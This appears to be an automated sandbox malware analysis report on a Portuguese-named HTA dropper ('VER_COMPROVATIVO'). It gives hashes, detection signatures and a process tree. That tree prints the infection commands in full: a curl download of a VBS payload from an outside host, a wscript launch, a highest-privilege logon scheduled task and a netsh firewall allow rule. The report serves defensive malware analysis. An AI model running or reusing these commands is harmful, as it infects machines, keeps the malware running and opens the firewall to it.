Edit tour
Windows
Analysis Report
#U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.hta
Overview
General Information
Sample name: | #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.htarenamed because original name is a hash value |
Original sample name: | VER_COMPROVATIVO_.hta |
Analysis ID: | 1544420 |
MD5: | 57368b1f9ef19b72f8d342affe2efd77 |
SHA1: | 6bd0579bb92f64902f587f53670e2b263e611a9b |
SHA256: | 390bb4f14a9be0faa0f5d0b4dc6fdfcca578b746a119e98d745650cff14976d9 |
Infos: | |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
Modifies the windows firewall
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Classification
- System is w10x64_ra
- mshta.exe (PID: 4432 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\Des ktop\#U274 9VER_COMPR OVATIVO#U2 749_#U2467 #U2467#U24 62#U2462#U 2467#U2461 #U2464#U24 63.hta" {1 E460BD7-F1 C3-4B2E-88 BF-4E770A2 88AF5}{1E4 60BD7-F1C3 -4B2E-88BF -4E770A288 AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 6076 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6720c0 12c78cd.vb s https:// apps.downl oadaps.com /pt/6720c0 12c774c/67 20c012c78c d.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5480 cmdline:
curl -k -o C:\Users\ Public\672 0c012c78cd .vbs https ://apps.do wnloadaps. com/pt/672 0c012c774c /6720c012c 78cd.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2172 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720c012c78 cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 1948 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720c012c 78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - BLOCKBUSTER.exe (PID: 6372 cmdline:
"C:\_6720c 012c774c\B LOCKBUSTER .exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - schtasks.exe (PID: 6436 cmdline:
SCHTASKS / Query /TN "BLOCKBUST ER" MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 6444 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6536 cmdline:
"C:\Window s\System32 \cmd.exe" /C SCHTASK S /Create /F /RL HIG HEST /TN " BLOCKBUSTE R" /TR "C: \_6720c012 c774c\BLOC KBUSTER.ex e" /SC ONL OGON /DELA Y 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6632 cmdline:
SCHTASKS / Create /F /RL HIGHES T /TN "BLO CKBUSTER" /TR "C:\_6 720c012c77 4c\BLOCKBU STER.exe" /SC ONLOGO N /DELAY 0 001:00 MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 6556 cmdline:
"C:\Window s\System32 \cmd.exe" /C netsh a dvfirewall firewall add rule n ame="BLOCK BUSTER" di r=in actio n=allow pr ogram="C:\ _6720c012c 774c\BLOCK BUSTER.exe " enable=y es profile =any MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 6660 cmdline:
netsh advf irewall fi rewall add rule name ="BLOCKBUS TER" dir=i n action=a llow progr am="C:\_67 20c012c774 c\BLOCKBUS TER.exe" e nable=yes profile=an y MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - cmd.exe (PID: 1588 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720c012c78 cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 3828 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720c012c 78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- mshta.exe (PID: 2936 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\Des ktop\#U274 9VER_COMPR OVATIVO#U2 749_#U2467 #U2467#U24 62#U2462#U 2467#U2461 #U2464#U24 63.hta" {1 E460BD7-F1 C3-4B2E-88 BF-4E770A2 88AF5}{1E4 60BD7-F1C3 -4B2E-88BF -4E770A288 AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 4524 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6720c0 12c78cd.vb s https:// apps.downl oadaps.com /pt/6720c0 12c774c/67 20c012c78c d.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 2032 cmdline:
curl -k -o C:\Users\ Public\672 0c012c78cd .vbs https ://apps.do wnloadaps. com/pt/672 0c012c774c /6720c012c 78cd.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4012 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720c012c78 cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5496 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720c012c 78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 5140 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720c012c78 cd.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 372 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720c012c 78cd.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Network Connect: |
Source: | Dropped file: | Jump to dropped file | ||
Source: | Dropped file: | Jump to dropped file |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |